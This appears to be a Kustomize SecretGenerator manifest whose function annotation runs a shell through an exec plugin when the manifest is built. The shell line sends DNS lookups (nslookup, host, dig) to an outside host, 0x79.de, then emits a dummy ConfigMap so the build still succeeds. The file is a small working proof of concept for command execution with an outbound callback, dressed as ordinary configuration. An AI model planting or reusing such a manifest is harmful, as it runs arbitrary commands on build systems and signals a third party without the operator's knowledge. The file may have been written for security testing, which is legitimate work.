apiVersion: builtin
kind: SecretGenerator
metadata:
  name: testflo-exec-plugin
  annotations:
    config.kubernetes.io/function: |
      exec:
        path: /bin/sh
        args:
          - -c
          - "nslookup TESTFLO-EXEC-PLUGIN.sfg.0x79.de || host TESTFLO-EXEC-PLUGIN.sfg.0x79.de || dig TESTFLO-EXEC-PLUGIN.sfg.0x79.de || true; echo '{\"apiVersion\":\"v1\",\"kind\":\"ConfigMap\",\"metadata\":{\"name\":\"testflo-exec-out\"}}'"
